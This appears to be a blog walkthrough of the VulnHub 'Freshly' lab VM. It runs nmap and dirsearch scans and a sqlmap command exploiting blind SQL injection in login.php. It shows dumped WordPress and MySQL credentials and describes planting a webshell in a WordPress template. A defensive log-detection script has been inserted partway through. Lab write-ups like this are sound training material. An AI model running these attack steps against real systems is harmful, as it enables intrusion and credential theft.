NEKO

vulnhub-Freshly

2018/07/26

Host discovery

netdiscover -r 10.10.10.0/24   # on the same LAN

or

nmap -sP 10.10.10.0/24

Confirmed host IP: 10.10.10.188

Service scan

nmap -sS -Pn -T4 10.10.10.188

Three services:

80/tcp   open  http
443/tcp open https
8080/tcp open http-proxy

Detailed probing of the ports

nmap -A -O -p80,443,8080 10.10.10.188

PORT     STATE SERVICE  VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05
|_Not valid after: 2025-02-14T03:30:05
8080/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).

Port 80: a plain HTTP service.
Port 443: WordPress is found.
Port 8080: cannot be reached.

Directory scan

python3 dirsearch.py -u http://10.10.10.188/ -e *

Found the /login.php and /phpmyadmin pages.

Dumping the database

A quick test on the login.php page shows that the user parameter is vulnerable to both time-based and boolean-based blind SQL injection, so run sqlmap against it.

sqlmap -u "http://10.10.10.188/login.php" --data "user=admin&password=123&s=Submit" -p "user" --level 3

Yet sqlmap only detected the time-based injection??
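From the defender's side, the time-based blind injection described above leaves a clear trace: bursts of requests to login.php that each take about as long as the injected sleep, often with sqlmap's default User-Agent. The following added example (not part of the original write-up) runs that check over constructed Apache access-log lines; it assumes a LogFormat that appends %D (response time in microseconds) to the combined format, which is not the VM's own configuration.

```python
import re
from collections import defaultdict

# Constructed sample lines: Apache "combined" format with a trailing %D field
# (response time in microseconds). This LogFormat is an assumption for the example.
SAMPLE_LOG = """\
10.10.10.5 - - [26/Jul/2018:11:40:01 +0800] "POST /login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0" 18342
10.10.10.5 - - [26/Jul/2018:11:40:03 +0800] "POST /login.php HTTP/1.1" 200 512 "-" "sqlmap/1.2.7#stable (http://sqlmap.org)" 5012345
10.10.10.5 - - [26/Jul/2018:11:40:09 +0800] "POST /login.php HTTP/1.1" 200 512 "-" "sqlmap/1.2.7#stable (http://sqlmap.org)" 5008811
10.10.10.5 - - [26/Jul/2018:11:40:15 +0800] "POST /login.php HTTP/1.1" 200 512 "-" "sqlmap/1.2.7#stable (http://sqlmap.org)" 20133
10.10.10.7 - - [26/Jul/2018:11:41:00 +0800] "GET /phpmyadmin/ HTTP/1.1" 200 9876 "-" "Mozilla/5.0" 40211
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" (?P<usec>\d+)$'
)

# sqlmap's default time-based payload sleeps 5 s; leave headroom for jitter.
SLOW_USEC = 4_000_000


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_blind_sqli_candidates(log_text, path="/login.php", min_slow=2):
    """Return {ip: {"slow": n, "scanner_ua": bool}} for source IPs that sent at
    least `min_slow` abnormally slow requests to `path`, or used a scanner UA."""
    per_ip = defaultdict(lambda: {"slow": 0, "scanner_ua": False})
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if not rec or rec["path"] != path:
            continue  # only the login endpoint is of interest here
        stats = per_ip[rec["ip"]]
        if int(rec["usec"]) >= SLOW_USEC:
            stats["slow"] += 1
        if rec["ua"].lower().startswith("sqlmap"):
            stats["scanner_ua"] = True
    return {ip: s for ip, s in per_ip.items()
            if s["slow"] >= min_slow or s["scanner_ua"]}


if __name__ == "__main__":
    for ip, stats in find_blind_sqli_candidates(SAMPLE_LOG).items():
        print(f"{ip}: {stats['slow']} slow login.php requests, scanner UA={stats['scanner_ua']}")
```

The slow-request count is the more robust signal, since a User-Agent is trivially changed; the real fix is a parameterised query in login.php.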

WordPress admin username and password:

+----------+---------------------+
| username | password            |
+----------+---------------------+
| admin    | SuperSecretPassword |
+----------+---------------------+

MySQL username and password hash:

root
060C1AFC38904259EBAF6362307E3C5BAADE7141(SuperSecretPassword)

getshell

Log into the WordPress admin panel -> top-left icon -> About WordPress -> version: WordPress 4.1.24
Alternatively, find it in the homepage source:

<meta name="generator" content="WordPress 4.1.24"/>

Appearance -> Editor -> edit the 404 template -> write in a one-line webshell

AntSword needs a proxy configured to connect over HTTPS;
China Chopper connects directly.
Finally, the flag is found in /etc/password.

Original author: n3k0

Published: July 26th 2018, 11:47:28

A roar: without 魔夜2 to play I'm going to die
